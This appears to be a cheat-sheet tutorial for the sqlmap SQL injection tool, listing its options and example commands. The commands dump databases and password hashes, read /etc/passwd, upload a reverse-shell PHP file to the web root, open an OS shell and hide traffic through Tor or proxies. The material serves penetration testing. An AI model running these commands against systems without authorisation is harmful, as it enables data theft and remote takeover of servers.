Complete SQLmap tutorial to test a databases management system security
SqlMap define target options
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-d DIRECT Connection string for direct database connection
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
-r
sqlmap -r req.txt -p namePeople
SQLmap Tutorial Enumeration
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
Dump everything
sqlmap -r req.txt -p namePeople --all
sqlmap -r req.txt -p namePeople --banner
Read All Databases
sqlmap -r req.txt -p namePeople --dbs
Read Current user
sqlmap -r req.txt -p namePeople --current-user
sqlmap -r req.txt -p namePeople --roles
Read System users
sqlmap -r req.txt -p namePeople --users
Read Hostname
sqlmap -r req.txt -p namePeople --hostname
Read User Privileges
sqlmap -r req.txt -p namePeople --privileges
SQLmap File System Access
File system access:
These options can be used to access the back-end database management
system underlying file system
--file-read=FILE.. Read a file from the back-end DBMS file system
--file-write=FIL.. Write a local file on the back-end DBMS file system
--file-dest=FILE.. Back-end DBMS absolute filepath to write to
Read file from Remote System
sqlmap -r req.txt -p namePeople --file-read=/etc/passwd --batch
Upload File to Remote System
sqlmap -r req.txt -p namePeople --file-write=/home/user/rshell.php --file-dest=/var/www/html --batch
SQLmap Operating System Access
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
sqlmap -r req.txt -p namePeople --os-cmd=ifconfig
sqlmap -r req.txt -p namePeople --os-shell
SQLmap Windows Registry Access
Windows registry access:
These options can be used to access the back-end database management
system Windows registry
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
SQLmap with Anonymity
--proxy=PROXY Use a proxy to connect to the target URL
--proxy-cred=PRO.. Proxy authentication credentials (name:password)
--proxy-file=PRO.. Load proxy list from a file
--proxy-freq=PRO.. Requests between change of proxy from a given list
--tor Use Tor anonymity network
--tor-port=TORPORT Set Tor proxy port other than default
--tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
--check-tor Check to see if Tor is used properly
SQLmap over Proxy
sqlmap --proxy="http://<proxy-ip>:<proxy-port>"
sqlmap --proxy="http://<proxy-ip>:<proxy-port>" --proxy-cred=username:password
SQLmap over TOR
sqlmap --tor --tor-port=9050 --tor-type=SOCKS5 -r req.txt --dbs
sqlmap --check-tor
SQLmap Optimize Connections
sqlmap -r req.txt -p namePeople